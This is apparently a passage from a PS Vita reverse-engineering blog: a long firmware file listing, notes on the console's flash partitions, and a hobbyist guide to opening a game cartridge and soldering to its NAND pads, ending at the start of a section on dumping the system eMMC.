vs0:sys/external/libcdlg_invitation_impl.suprx
vs0:sys/external/libcdlg_main.suprx
vs0:sys/external/libcdlg_msg.suprx
vs0:sys/external/libcdlg_near.suprx
vs0:sys/external/libcdlg_netcheck.suprx
vs0:sys/external/libcdlg_np_message.suprx
vs0:sys/external/libcdlg_np_sns_fb.suprx
vs0:sys/external/libcdlg_np_trophy_setup.suprx
vs0:sys/external/libcdlg_npeula.suprx
vs0:sys/external/libcdlg_npprofile2.suprx
vs0:sys/external/libcdlg_photoimport.suprx
vs0:sys/external/libcdlg_photoreview.suprx
vs0:sys/external/libcdlg_pocketstation.suprx
vs0:sys/external/libcdlg_remote_osk.suprx
vs0:sys/external/libcdlg_savedata.suprx
vs0:sys/external/libcdlg_tw_login.suprx
vs0:sys/external/libcdlg_twitter.suprx
vs0:sys/external/libclipboard.suprx
vs0:sys/external/libdbg.suprx
vs0:sys/external/libfiber.suprx
vs0:sys/external/libfios2.suprx
vs0:sys/external/libg729.suprx
vs0:sys/external/libgameupdate.suprx
vs0:sys/external/libhandwriting.suprx
vs0:sys/external/libhttp.suprx
vs0:sys/external/libime.suprx
vs0:sys/external/libipmi_nongame.suprx
vs0:sys/external/liblocation.suprx
vs0:sys/external/liblocation_extension.suprx
vs0:sys/external/liblocation_factory.suprx
vs0:sys/external/liblocation_internal.suprx
vs0:sys/external/libmln.suprx
vs0:sys/external/libmlnapplib.suprx
vs0:sys/external/libmlndownloader.suprx
vs0:sys/external/libnaac.suprx
vs0:sys/external/libnet.suprx
vs0:sys/external/libnetctl.suprx
vs0:sys/external/libngs.suprx
vs0:sys/external/libpaf.suprx
vs0:sys/external/libpaf_web_map_view.suprx
vs0:sys/external/libperf.suprx
vs0:sys/external/libpgf.suprx
vs0:sys/external/libpvf.suprx
vs0:sys/external/librudp.suprx
vs0:sys/external/libsas.suprx
vs0:sys/external/libsceavplayer.suprx
vs0:sys/external/libscejpegarm.suprx
vs0:sys/external/libscejpegencarm.suprx
vs0:sys/external/libscemp4.suprx
vs0:sys/external/libshellsvc.suprx
vs0:sys/external/libssl.suprx
vs0:sys/external/libsulpha.suprx
vs0:sys/external/libsystemgesture.suprx
vs0:sys/external/libult.suprx
vs0:sys/external/libvoice.suprx
vs0:sys/external/libvoiceqos.suprx
vs0:sys/external/livearea_util.suprx
vs0:sys/external/mail_api_for_local_libc.suprx
vs0:sys/external/near_profile.suprx
vs0:sys/external/notification_util.suprx
vs0:sys/external/np_activity.suprx
vs0:sys/external/np_activity_sdk.suprx
vs0:sys/external/np_basic.suprx
vs0:sys/external/np_commerce2.suprx
vs0:sys/external/np_common.suprx
vs0:sys/external/np_common_ps4.suprx
vs0:sys/external/np_friend_privacylevel.suprx
vs0:sys/external/np_kdc.suprx
vs0:sys/external/np_manager.suprx
vs0:sys/external/np_matching2.suprx
vs0:sys/external/np_message.suprx
vs0:sys/external/np_message_contacts.suprx
vs0:sys/external/np_message_dialog_impl.suprx
vs0:sys/external/np_message_padding.suprx
vs0:sys/external/np_party.suprx
vs0:sys/external/np_ranking.suprx
vs0:sys/external/np_signaling.suprx
vs0:sys/external/np_sns_facebook.suprx
vs0:sys/external/np_trophy.suprx
vs0:sys/external/np_tus.suprx
vs0:sys/external/np_utility.suprx
vs0:sys/external/np_webapi.suprx
vs0:sys/external/party_member_list.suprx
vs0:sys/external/psmkdc.suprx
vs0:sys/external/pspnet_adhoc.suprx
vs0:sys/external/signin_ext.suprx
vs0:sys/external/sqlite.suprx
vs0:sys/external/store_checkout_plugin.suprx
vs0:sys/external/trigger_util.suprx
vs0:sys/external/web_ui_plugin.suprx
vs0:sys/internal
vs0:tool
vs0:vsh/common/app_settings.suprx
vs0:vsh/common/app_settings_plugin.rco
vs0:vsh/common/auth_plugin.rco
vs0:vsh/common/auth_plugin.suprx
vs0:vsh/common/av_content_handler.suprx
vs0:vsh/common/backup_restore.suprx
vs0:vsh/common/content_operation.suprx
vs0:vsh/common/dbrecovery_plugin.rco
vs0:vsh/common/dbrecovery_plugin.suprx
vs0:vsh/common/dbsetup.suprx
vs0:vsh/common/libBEAVCorePlayer.suprx
vs0:vsh/common/libFflMp4.suprx
vs0:vsh/common/libSenvuabsFFsdk.suprx
vs0:vsh/common/libical.suprx
vs0:vsh/common/libicalss.suprx
vs0:vsh/common/libmarlin.suprx
vs0:vsh/common/libmarlin_pb.suprx
vs0:vsh/common/libmarlindownloader.suprx
vs0:vsh/common/libmtp.suprx
vs0:vsh/common/libmtphttp.suprx
vs0:vsh/common/libmtphttp_wrapper.suprx
vs0:vsh/common/libvideoprofiler.suprx
vs0:vsh/common/mail_api_for_local.suprx
vs0:vsh/common/mms/AACPromoter.suprx
vs0:vsh/common/mms/Mp3Promoter.suprx
vs0:vsh/common/mms/MsvPromoter.suprx
vs0:vsh/common/mms/RiffPromoter.suprx
vs0:vsh/common/mms/SensMe.suprx
vs0:vsh/common/mms/bmp_promoter.suprx
vs0:vsh/common/mms/db_template/AVContentMusic.db
vs0:vsh/common/mms/db_template/AVContentPhoto.db
vs0:vsh/common/mms/db_template/AVContentVideo.db
vs0:vsh/common/mms/db_template/addressbook.db
vs0:vsh/common/mms/db_template/calendar.db
vs0:vsh/common/mms/db_template/friends.db
vs0:vsh/common/mms/db_template/grpmsgui.db
vs0:vsh/common/mms/db_template/messages.db
vs0:vsh/common/mms/db_template/near.db
vs0:vsh/common/mms/gif_promoter.suprx
vs0:vsh/common/mms/jpeg_promoter.suprx
vs0:vsh/common/mms/meta_gen.suprx
vs0:vsh/common/mms/png_promoter.suprx
vs0:vsh/common/mms/tiff_promoter.suprx
vs0:vsh/common/mtp_client.suprx
vs0:vsh/common/mtpr3.suprx
vs0:vsh/common/np_grief_report.suprx
vs0:vsh/common/webcore.suprx
vs0:vsh/etc/index.dat
vs0:vsh/game/contents
vs0:vsh/game/gamecard_installer_plugin.rco
vs0:vsh/game/gamecard_installer_plugin.suprx
vs0:vsh/game/gamedata_plugin.rco
vs0:vsh/game/gamedata_plugin.suprx
vs0:vsh/game/psm/contents/LA_DeveloperLink.png
vs0:vsh/game/psm/contents/LA_bg.png
vs0:vsh/game/psm/contents/notice_frame.xml
vs0:vsh/game/psm/runtime_icon.png
vs0:vsh/game/psm/runtime_version.txt
vs0:vsh/game/psp_icon_base.raw
vs0:vsh/import_savedata/import_savedata_plugin.rco
vs0:vsh/initialsetup/firstboot_plugin.rco
vs0:vsh/initialsetup/initialsetup.self
vs0:vsh/initialsetup/initialsetup_plugin.rco
vs0:vsh/initialsetup/sce_sys/param.sfo
vs0:vsh/mtpresponder/CMAInstaller.img
vs0:vsh/mtpresponder/DevIcon.fil
vs0:vsh/online_storage/online_storage_plugin.rco
vs0:vsh/online_storage/online_storage_plugin.suprx
vs0:vsh/shell/applauncher_plugin.rco
vs0:vsh/shell/auth_reset_plugin.rco
vs0:vsh/shell/auth_reset_plugin.suprx
vs0:vsh/shell/builtin_service_info.rco
vs0:vsh/shell/coldboot_plugin.rco
vs0:vsh/shell/download_plugin.rco
vs0:vsh/shell/idu_update_plugin.rco
vs0:vsh/shell/idu_update_plugin.suprx
vs0:vsh/shell/ime_plugin.rco
vs0:vsh/shell/ime_plugin.suprx
vs0:vsh/shell/impose_net_plugin.rco
vs0:vsh/shell/impose_net_plugin.suprx
vs0:vsh/shell/impose_plugin.rco
vs0:vsh/shell/indicator_plugin.rco
vs0:vsh/shell/liblocation_permission.suprx
vs0:vsh/shell/livearea/a1.rco
vs0:vsh/shell/livearea/a2.rco
vs0:vsh/shell/livearea/a3.rco
vs0:vsh/shell/livearea/a4.rco
vs0:vsh/shell/livearea/a5.rco
vs0:vsh/shell/livearea/ad0.rco
vs0:vsh/shell/livearea/ad1.rco
vs0:vsh/shell/livearea/ad2.rco
vs0:vsh/shell/livearea/ad3.rco
vs0:vsh/shell/livearea/ad4.rco
vs0:vsh/shell/livearea/browser.rco
vs0:vsh/shell/livearea/content_manager.rco
vs0:vsh/shell/livearea/kids.rco
vs0:vsh/shell/livearea/music.rco
vs0:vsh/shell/livearea/nsx1.rco
vs0:vsh/shell/livearea/ps1emu.rco
vs0:vsh/shell/livearea/psmobile.rco
vs0:vsh/shell/livearea/pspemu.rco
vs0:vsh/shell/livearea/vd.rco
vs0:vsh/shell/livearea_icon.png
vs0:vsh/shell/livearea_plugin.rco
vs0:vsh/shell/livespace_db.suprx
vs0:vsh/shell/location_dialog_plugin.suprx
vs0:vsh/shell/location_plugin.rco
vs0:vsh/shell/musiccore_plugin.rco
vs0:vsh/shell/power_manage_plugin.rco
vs0:vsh/shell/shell.self
vs0:vsh/shell/telephony/apn/tel_apn_list0a.ini
vs0:vsh/shell/telephony/apn/tel_apn_list0b.ini
vs0:vsh/shell/telephony/apn/tel_apn_list1a.ini
vs0:vsh/shell/telephony/apn/tel_apn_list1b.ini
vs0:vsh/shell/telephony/apn/tel_apn_list2a.ini
vs0:vsh/shell/telephony/apn/tel_apn_list2b.ini
vs0:vsh/shell/telephony/apn/tel_apn_list3a.ini
vs0:vsh/shell/telephony/apn/tel_apn_list3b.ini
vs0:vsh/shell/telephony/apn/tel_apn_list4a.ini
vs0:vsh/shell/telephony/apn/tel_apn_list4b.ini
vs0:vsh/shell/telephony/apn/tel_apn_list5a.ini
vs0:vsh/shell/telephony/apn/tel_apn_list5b.ini
vs0:vsh/shell/telephony/apn/tel_apn_list6a.ini
vs0:vsh/shell/telephony/apn/tel_apn_list6b.ini
vs0:vsh/shell/telephony/apn/tel_apn_list7a.ini
vs0:vsh/shell/telephony/apn/tel_apn_list7b.ini
vs0:vsh/shell/telephony/apn/tel_apn_list8a.ini
vs0:vsh/shell/telephony/apn/tel_apn_list8b.ini
vs0:vsh/shell/telephony/apn/tel_apn_list9a.ini
vs0:vsh/shell/telephony/apn/tel_apn_list9b.ini
vs0:vsh/shell/telephony/initial_check/tel_initial_check_plugin.rco
vs0:vsh/shell/telephony/initial_check/tel_initial_check_plugin.suprx
vs0:vsh/shell/telephony/tel_antenna_info.ini
vs0:vsh/shell/telephony/tel_apn_list.ini
vs0:vsh/shell/telephony/tel_operator_name_list.ini
vs0:vsh/shell/telephony/tel_operator_profile.ini
vs0:vsh/shell/telephony/telephony_sms.db
vs0:vsh/shell/telephony_plugin.rco
vs0:vsh/shell/theme_plugin.rco
vs0:vsh/shell/topmenu_plugin.rco
vs0:vsh/shell/trophy/bronze_thum.gim
vs0:vsh/shell/trophy/gold_thum.gim
vs0:vsh/shell/trophy/platinum_thum.gim
vs0:vsh/shell/trophy/silver_thum.gim
sa0:data/dic/utf16be/DA/DA/njubase1.a
sa0:data/dic/utf16be/DA/DA/njubase2.a
sa0:data/dic/utf16be/DA/DA/njubase3.a
sa0:data/dic/utf16be/DA/njcon.a
sa0:data/dic/utf16be/DE/njcon.a
sa0:data/dic/utf16be/DE/regular/njexyomi.a
sa0:data/dic/utf16be/DE/regular/njubase1.a
sa0:data/dic/utf16be/DE/regular/njubase2.a
sa0:data/dic/utf16be/DE/regular/njubase3.a
sa0:data/dic/utf16be/EN/GB/njubase1gb.a
sa0:data/dic/utf16be/EN/US/njubase1us.a
sa0:data/dic/utf16be/EN/njcon.a
sa0:data/dic/utf16be/EN/njubase1.a
sa0:data/dic/utf16be/EN/njubase2.a
sa0:data/dic/utf16be/EN/njubase3.a
sa0:data/dic/utf16be/EN/njyomi.a
sa0:data/dic/utf16be/ES/ES/njexyomi.a
sa0:data/dic/utf16be/ES/ES/njubase1.a
sa0:data/dic/utf16be/ES/ES/njubase2.a
sa0:data/dic/utf16be/ES/ES/njubase3.a
sa0:data/dic/utf16be/ES/njcon.a
sa0:data/dic/utf16be/FI/FI/njubase1.a
sa0:data/dic/utf16be/FI/FI/njubase2.a
sa0:data/dic/utf16be/FI/FI/njubase3.a
sa0:data/dic/utf16be/FI/njcon.a
sa0:data/dic/utf16be/FR/FR/regular/njexyomi.a
sa0:data/dic/utf16be/FR/FR/regular/njubase1.a
sa0:data/dic/utf16be/FR/FR/regular/njubase2.a
sa0:data/dic/utf16be/FR/FR/regular/njubase3.a
sa0:data/dic/utf16be/FR/njcon.a
sa0:data/dic/utf16be/IT/IT/njexyomi.a
sa0:data/dic/utf16be/IT/IT/njubase1.a
sa0:data/dic/utf16be/IT/IT/njubase2.a
sa0:data/dic/utf16be/IT/IT/njubase3.a
sa0:data/dic/utf16be/IT/njcon.a
sa0:data/dic/utf16be/JA/16/njexyomi.a
sa0:data/dic/utf16be/JA/16/njfzk.a
sa0:data/dic/utf16be/JA/16/njtan.a
sa0:data/dic/utf16be/JA/16/njubase1.a
sa0:data/dic/utf16be/JA/16/njubase2.a
sa0:data/dic/utf16be/JA/16/text
sa0:data/dic/utf16be/JA/njcon.a
sa0:data/dic/utf16be/KO/njcon.a
sa0:data/dic/utf16be/KO/njexyomi.a
sa0:data/dic/utf16be/KO/njtan.a
sa0:data/dic/utf16be/KO/njubase1.a
sa0:data/dic/utf16be/KO/njubase2.a
sa0:data/dic/utf16be/NL/NL/njubase1.a
sa0:data/dic/utf16be/NL/NL/njubase2.a
sa0:data/dic/utf16be/NL/NL/njubase3.a
sa0:data/dic/utf16be/NL/njcon.a
sa0:data/dic/utf16be/NO/NO/njubase1.a
sa0:data/dic/utf16be/NO/NO/njubase2.a
sa0:data/dic/utf16be/NO/NO/njubase3.a
sa0:data/dic/utf16be/NO/njcon.a
sa0:data/dic/utf16be/PL/PL/njubase1.a
sa0:data/dic/utf16be/PL/PL/njubase2.a
sa0:data/dic/utf16be/PL/PL/njubase3.a
sa0:data/dic/utf16be/PL/njcon.a
sa0:data/dic/utf16be/PT/BR/regular/njexyomi.a
sa0:data/dic/utf16be/PT/BR/regular/njubase1.a
sa0:data/dic/utf16be/PT/BR/regular/njubase2.a
sa0:data/dic/utf16be/PT/BR/regular/njubase3.a
sa0:data/dic/utf16be/PT/PT/regular/njexyomi.a
sa0:data/dic/utf16be/PT/PT/regular/njubase1.a
sa0:data/dic/utf16be/PT/PT/regular/njubase2.a
sa0:data/dic/utf16be/PT/PT/regular/njubase3.a
sa0:data/dic/utf16be/PT/njcon.a
sa0:data/dic/utf16be/RU/njcon.a
sa0:data/dic/utf16be/RU/regular/njexyomi.a
sa0:data/dic/utf16be/RU/regular/njubase1.a
sa0:data/dic/utf16be/RU/regular/njubase2.a
sa0:data/dic/utf16be/RU/regular/njubase3.a
sa0:data/dic/utf16be/SV/SV/njubase1.a
sa0:data/dic/utf16be/SV/SV/njubase2.a
sa0:data/dic/utf16be/SV/SV/njubase3.a
sa0:data/dic/utf16be/SV/njcon.a
sa0:data/dic/utf16be/ZH/CN/njcon.a
sa0:data/dic/utf16be/ZH/CN/pinyin/GB18030/njexyomi.a
sa0:data/dic/utf16be/ZH/CN/pinyin/GB18030/njexyomi.ad1
sa0:data/dic/utf16be/ZH/CN/pinyin/GB18030/njtan.a
sa0:data/dic/utf16be/ZH/CN/pinyin/GB18030/njtan.ad1.arz
sa0:data/dic/utf16be/ZH/CN/pinyin/GB18030/njubase1.a
sa0:data/dic/utf16be/ZH/CN/pinyin/GB18030/njubase1.ad1.arz
sa0:data/dic/utf16be/ZH/CN/pinyin/GB18030/njubase2.a
sa0:data/dic/utf16be/ZH/CN/pinyin/GB18030/njubase2.ad1.arz
sa0:data/dic/utf16be/ZH/CN/pinyin/GB18030/njubase3.a
sa0:data/dic/utf16be/ZH/CN/pinyin/GB18030/njubase3.ad1.arz
sa0:data/dic/utf16be/ZH/HK/jyutping/njexyomi.a
sa0:data/dic/utf16be/ZH/HK/jyutping/njexyomi.ad1
sa0:data/dic/utf16be/ZH/HK/jyutping/njtan.a
sa0:data/dic/utf16be/ZH/HK/jyutping/njtan.ad1.arz
sa0:data/dic/utf16be/ZH/HK/jyutping/njubase1.a
sa0:data/dic/utf16be/ZH/HK/jyutping/njubase1.ad1.arz
sa0:data/dic/utf16be/ZH/HK/jyutping/njubase2.a
sa0:data/dic/utf16be/ZH/HK/jyutping/njubase2.ad1.arz
sa0:data/dic/utf16be/ZH/HK/njcon.a
sa0:data/dic/utf16be/ZH/TW/bopomofo/njexyomi.a
sa0:data/dic/utf16be/ZH/TW/bopomofo/njexyomi.ad1
sa0:data/dic/utf16be/ZH/TW/bopomofo/njtan.a
sa0:data/dic/utf16be/ZH/TW/bopomofo/njtan.ad1.arz
sa0:data/dic/utf16be/ZH/TW/bopomofo/njubase1.a
sa0:data/dic/utf16be/ZH/TW/bopomofo/njubase1.ad1.arz
sa0:data/dic/utf16be/ZH/TW/bopomofo/njubase2.a
sa0:data/dic/utf16be/ZH/TW/bopomofo/njubase2.ad1.arz
sa0:data/dic/utf16be/ZH/TW/cangjie/njcangjie.a.arz
sa0:data/dic/utf16be/ZH/TW/njcon.a
sa0:data/dic/utf16be/ZH/TW/pinyin/njexyomi.a
sa0:data/dic/utf16be/ZH/TW/pinyin/njexyomi.ad1
sa0:data/dic/utf16be/ZH/TW/pinyin/njtan.a
sa0:data/dic/utf16be/ZH/TW/pinyin/njtan.ad1.arz
sa0:data/dic/utf16be/ZH/TW/pinyin/njubase1.a
sa0:data/dic/utf16be/ZH/TW/pinyin/njubase1.ad1.arz
sa0:data/dic/utf16be/ZH/TW/pinyin/njubase2.a
sa0:data/dic/utf16be/ZH/TW/pinyin/njubase2.ad1.arz
sa0:data/font/emoji
sa0:data/font/pgf/arib.pgf
sa0:data/font/pgf/gb3s1518.bwfon
sa0:data/font/pgf/jpn0.pgf
sa0:data/font/pgf/kr0.pgf
sa0:data/font/pgf/ltn0.pgf
sa0:data/font/pgf/ltn1.pgf
sa0:data/font/pgf/ltn10.pgf
sa0:data/font/pgf/ltn11.pgf
sa0:data/font/pgf/ltn12.pgf
sa0:data/font/pgf/ltn13.pgf
sa0:data/font/pgf/ltn14.pgf
sa0:data/font/pgf/ltn15.pgf
sa0:data/font/pgf/ltn2.pgf
sa0:data/font/pgf/ltn3.pgf
sa0:data/font/pgf/ltn4.pgf
sa0:data/font/pgf/ltn5.pgf
sa0:data/font/pgf/ltn6.pgf
sa0:data/font/pgf/ltn7.pgf
sa0:data/font/pgf/ltn8.pgf
sa0:data/font/pgf/ltn9.pgf
sa0:data/font/pvf/cn0.pvf
sa0:data/font/pvf/cn1.pvf
sa0:data/font/pvf/jpn0.pvf
sa0:data/font/pvf/jpn1.pvf
sa0:data/font/pvf/jpn2.pvf
sa0:data/font/pvf/jpn3.pvf
sa0:data/font/pvf/kr0.pvf
sa0:data/font/pvf/kr1.pvf
sa0:data/font/pvf/kr2.pvf
sa0:data/font/pvf/kr3.pvf
sa0:data/font/pvf/ltn0.pvf
sa0:data/font/pvf/ltn1.pvf
sa0:data/font/pvf/ltn2.pvf
sa0:data/font/pvf/ltn3.pvf
sa0:data/font/pvf/ltn4.pvf
sa0:data/font/pvf/ltn5.pvf
sa0:data/font/pvf/ltn6.pvf
sa0:data/font/pvf/ltn7.pvf
sa0:data/font/pvf/music_arib.pvf
sa0:data/font/pvf/psexchar.pvf
sa0:data/libhwr/all2_u.bin.hwz
sa0:data/libhwr/all_u.bin.hwz
sa0:data/libhwr/alnum_native_u.bin.hwz
sa0:data/libhwr/alnum_u.bin.hwz
sa0:data/libhwr/alnumlat1_u.bin.hwz
sa0:data/libhwr/chinese_simplified1_u.bin.hwz
sa0:data/libhwr/chinese_traditional_u.bin.hwz
sa0:data/libhwr/dan_nor_u.bin.hwz
sa0:data/libhwr/dutch_u.bin.hwz
sa0:data/libhwr/french_u.bin.hwz
sa0:data/libhwr/german_u.bin.hwz
sa0:data/libhwr/hangul_u.bin.hwz
sa0:data/libhwr/hira_u.bin.hwz
sa0:data/libhwr/icelandic_u.bin.hwz
sa0:data/libhwr/italian_u.bin.hwz
sa0:data/libhwr/kanji2_u.bin.hwz
sa0:data/libhwr/kanji_u.bin.hwz
sa0:data/libhwr/kata_u.bin.hwz
sa0:data/libhwr/korean_u.bin.hwz
sa0:data/libhwr/polish_u.bin.hwz
sa0:data/libhwr/portuguese_u.bin.hwz
sa0:data/libhwr/russian_u.bin.hwz
sa0:data/libhwr/spanish_u.bin.hwz
sa0:data/libhwr/swe_fin_u.bin.hwz
tm0:nphome
tm0:SceIoTrash
vd0:history/data.bak
vd0:history/data.bin
vd0:network/ifstat.bin
vd0:registry/system.dreg
vd0:registry/system.ireg
vd0:SceIoTrash
ud0:PSP2UPDATE
ud0:SceIoTrash
pd0:app/NPXS10007/data/guidemovie/movie.mp4
pd0:app/NPXS10007/eboot.bin
pd0:app/NPXS10007/HelloFace/DATA_GRAPH.BPM
pd0:app/NPXS10007/HelloFace/DATA_MAIN.BPM
pd0:app/NPXS10007/package/boundwave.tar
pd0:app/NPXS10007/package/firsttouch.tar
pd0:app/NPXS10007/package/gamestart.tar
pd0:app/NPXS10007/package/gamestart_locale_cs.tar
pd0:app/NPXS10007/package/gamestart_locale_ct.tar
pd0:app/NPXS10007/package/gamestart_locale_da.tar
pd0:app/NPXS10007/package/gamestart_locale_du.tar
pd0:app/NPXS10007/package/gamestart_locale_fi.tar
pd0:app/NPXS10007/package/gamestart_locale_fr.tar
pd0:app/NPXS10007/package/gamestart_locale_ge.tar
pd0:app/NPXS10007/package/gamestart_locale_it.tar
pd0:app/NPXS10007/package/gamestart_locale_ja.tar
pd0:app/NPXS10007/package/gamestart_locale_ko.tar
pd0:app/NPXS10007/package/gamestart_locale_no.tar
pd0:app/NPXS10007/package/gamestart_locale_pb.tar
pd0:app/NPXS10007/package/gamestart_locale_pl.tar
pd0:app/NPXS10007/package/gamestart_locale_pr.tar
pd0:app/NPXS10007/package/gamestart_locale_ru.tar
pd0:app/NPXS10007/package/gamestart_locale_sp.tar
pd0:app/NPXS10007/package/gamestart_locale_sw.tar
pd0:app/NPXS10007/package/opening.tar
pd0:app/NPXS10007/package/photopazzle.tar
pd0:app/NPXS10007/package/survival.tar
pd0:app/NPXS10007/package/topmenu2.tar
pd0:app/NPXS10007/package/ui.tar
pd0:app/NPXS10007/sce_module/libc.suprx
pd0:app/NPXS10007/sce_module/libfios2.suprx
pd0:app/NPXS10007/sce_module/libult.suprx
pd0:app/NPXS10007/sce_pfs/files.db
pd0:app/NPXS10007/sce_pfs/unicv.db
pd0:app/NPXS10007/sce_sys/clearsign
pd0:app/NPXS10007/sce_sys/icon0.png
pd0:app/NPXS10007/sce_sys/keystone
pd0:app/NPXS10007/sce_sys/livearea/contents/bg0.png
pd0:app/NPXS10007/sce_sys/livearea/contents/mov_icon.png
pd0:app/NPXS10007/sce_sys/livearea/contents/startup.png
pd0:app/NPXS10007/sce_sys/livearea/contents/template.xml
pd0:app/NPXS10007/sce_sys/package/body.bin
pd0:app/NPXS10007/sce_sys/package/head.bin
pd0:app/NPXS10007/sce_sys/package/stat.bin
pd0:app/NPXS10007/sce_sys/package/tail.bin
pd0:app/NPXS10007/sce_sys/package/temp.bin
pd0:app/NPXS10007/sce_sys/param.sfo
pd0:app/NPXS10007/sce_sys/pic0.png
pd0:app/NPXS10007/sce_sys/trophy/NPWR02174_00/TROPHY.TRP
pd0:app/NPXS10007/shader/vsd/irh_surface_f.psp2.vsd
pd0:app/NPXS10007/shader/vsd/irh_surface_v.psp2.vsd
pd0:app/NPXS10007/sound/BGM_InGame1.sxd
pd0:app/NPXS10007/sound/BGM_InGame2.sxd
pd0:app/NPXS10007/sound/BGM_TopMenu.sxd
pd0:app/NPXS10007/sound/narration/cs/WP_VO.sxd1
pd0:app/NPXS10007/sound/narration/cs/WP_VO.sxd2
pd0:app/NPXS10007/sound/narration/ct/WP_VO.sxd1
pd0:app/NPXS10007/sound/narration/ct/WP_VO.sxd2
pd0:app/NPXS10007/sound/narration/da/WP_VO.sxd1
pd0:app/NPXS10007/sound/narration/da/WP_VO.sxd2
pd0:app/NPXS10007/sound/narration/du/WP_VO.sxd1
pd0:app/NPXS10007/sound/narration/du/WP_VO.sxd2
pd0:app/NPXS10007/sound/narration/en/WP_VO.sxd1
pd0:app/NPXS10007/sound/narration/en/WP_VO.sxd2
pd0:app/NPXS10007/sound/narration/fi/WP_VO.sxd1
pd0:app/NPXS10007/sound/narration/fi/WP_VO.sxd2
pd0:app/NPXS10007/sound/narration/fr/WP_VO.sxd1
pd0:app/NPXS10007/sound/narration/fr/WP_VO.sxd2
pd0:app/NPXS10007/sound/narration/ge/WP_VO.sxd1
pd0:app/NPXS10007/sound/narration/ge/WP_VO.sxd2
pd0:app/NPXS10007/sound/narration/it/WP_VO.sxd1
pd0:app/NPXS10007/sound/narration/it/WP_VO.sxd2
pd0:app/NPXS10007/sound/narration/ja/WP_VO.sxd1
pd0:app/NPXS10007/sound/narration/ja/WP_VO.sxd2
pd0:app/NPXS10007/sound/narration/ko/WP_VO.sxd1
pd0:app/NPXS10007/sound/narration/ko/WP_VO.sxd2
pd0:app/NPXS10007/sound/narration/no/WP_VO.sxd1
pd0:app/NPXS10007/sound/narration/no/WP_VO.sxd2
pd0:app/NPXS10007/sound/narration/pb/WP_VO.sxd1
pd0:app/NPXS10007/sound/narration/pb/WP_VO.sxd2
pd0:app/NPXS10007/sound/narration/pl/WP_VO.sxd1
pd0:app/NPXS10007/sound/narration/pl/WP_VO.sxd2
pd0:app/NPXS10007/sound/narration/pr/WP_VO.sxd1
pd0:app/NPXS10007/sound/narration/pr/WP_VO.sxd2
pd0:app/NPXS10007/sound/narration/ru/WP_VO.sxd1
pd0:app/NPXS10007/sound/narration/ru/WP_VO.sxd2
pd0:app/NPXS10007/sound/narration/sp/WP_VO.sxd1
pd0:app/NPXS10007/sound/narration/sp/WP_VO.sxd2
pd0:app/NPXS10007/sound/narration/sw/WP_VO.sxd1
pd0:app/NPXS10007/sound/narration/sw/WP_VO.sxd2
pd0:app/NPXS10007/sound/narration/uk/WP_VO.sxd1
pd0:app/NPXS10007/sound/narration/uk/WP_VO.sxd2
pd0:app/NPXS10007/sound/narration/us
pd0:app/NPXS10007/sound/narration/WP_bus_rev.sxd
pd0:app/NPXS10007/sound/WP_15P_SE.sxd
pd0:app/NPXS10007/sound/WP_1st_SE.sxd
pd0:app/NPXS10007/sound/WP_BB_SE.sxd
pd0:app/NPXS10007/sound/WP_COM_SE.sxd
pd0:app/NPXS10007/sound/WP_SW_SE.sxd
pd0:app/NPXS10007/sound/WP_TOP_SE.sxd
pd0:data/systembgm/home.at9
pd0:data/systembgm/initialsetup.at9
pd0:data/systembgm/near.at9
pd0:data/systembgm/signup.at9
pd0:data/systembgm/store.at9
pd0:license/app/NPXS10007/6488b73b912a753a492e2714e9b38bc7.rif

Partitions

If you’re still reading, here’s some details of a selected few of the partitions found on the Vita as a bonus.

  • os0 found on the NAND is where the “main” OS files are including all the kernel libraries and the most important user libraries. There’s always two copies of this for redundancy and updating will only update the inactive partition and the active flag is swapped.
  • sa0 found on the NAND is the “bulky” data like fonts and handwriting information. Why is it a separate partition? Because it makes update files smaller. Your “systemdata” PUP provides the update for this partition.
  • vs0 found on the NAND is the rest of the OS including all the system apps, the main shell, and the remaining user libraries
  • vd0 found on the NAND is mainly used for the system registry (settings)
  • ud0 found on the NAND is used for updates. When you update the Vita, the update file is copied here and the system reboots.
  • pd0 found on the NAND is where Welcome Park (and the intro video) are found. It is also the “preinst” PUP update.
  • ur0 found on the NAND is the remaining user data that is structured similarly to the memory card (it shares almost the same directory structure). App icon layout for example is found here.
  • ux0 is the memory card
  • gro0 is the game card
  • grw0 is the writable part of the game card if supported

How to Disassemble Vita Game Cartridges

A hacker named katsu recently released a method for dumping Vita games. As a developer, I am completely against piracy, but as a reverse engineer I can’t shy away from taking apart perfectly working devices. However, most pictures I see of Vita game carts taken apart show the game cart casing damaged beyond repair or completely destroyed. I managed to take apart a game cart and put it together with no obvious signs of damage, and I thought I would share my (simple) method here.

Photo Feb 16, 7 48 07 PM

 

If you take a look at the top right or left corner of the game cart, you can see a line of where the two halves of the plastic was glued together. Locate the upper left corner and, with a sharp knife, push the blade into the line on the corner until you have a small dent. Then, move the knife downwards and wiggle the knife until you loosen the glue for the entire left side of the cart. Then keep moving the knife down and when you hit the bottom of the cart, turn and lose about half the bottom edge of the cart. Now you can use your fingers to spread the two halves apart (but be careful not to use too much force and tear the glue from the other two edges), and you can either shake the memory chip out or use a pair of tweezers.

Photo Feb 16, 7 42 47 PM

 

If you were to follow katsu’s pinout, you need to solder to the copper pads. A trick for doing so is to first flux up the points and then melt a pea-sized blob of solder in middle of all the points. Then take your iron and spread the blob around until all the pads are soldered up. Then just make the the remaining blob is not on top of any copper and you can easily remove it.

Photo Feb 16, 8 29 57 PM

 

Then you can solder wires onto the points to your heart’s content. After you’re done with everything, you can easily put the memory chip back into the casing and there is enough glue to keep the two halves of the case together (along with the memory chip). You can then continue to play the game.

Pinout for Vita game cart. Credits to katsu.

If you were to follow the pinout, you can see that it appears to be a standard NAND pinout (not eMMC and not Memory Stick Duo). I have not tested this, but I believe this means you can use NANDWay or any other NAND dumping technique (there’s lots for PS3 and Xbox 360) provided you attach to the right pins. I suspect that the Vita communicates with the game cart through the SD protocol with an additional line for a security interface, but that is just speculation. If that were the case, having one-to-one dumps would not allow you to create clone games. Regardless, I will not be looking too much into game carts because they are so closely tied with piracy.

Dumping the Vita NAND

When we last left off, I had spent an excess of 100 hours (I’m not exaggerating since that entire time I was working, I listened to This American Life and went through over a hundred one-hour episodes) soldering and tinkering with the Vita logic board to try to dump the eMMC. I said I was going to buy a eMMC socket from taobao (the socket would have let me clamp a eMMC chip down while pins stick out, allowing the pressure to create a connection) however, I found out that all the sellers of the eMMC socket from taobao don’t ship to the USA and American retailers sell the sockets for $300 (cheapest I could find). So I took another approach.

Packet Sniffing

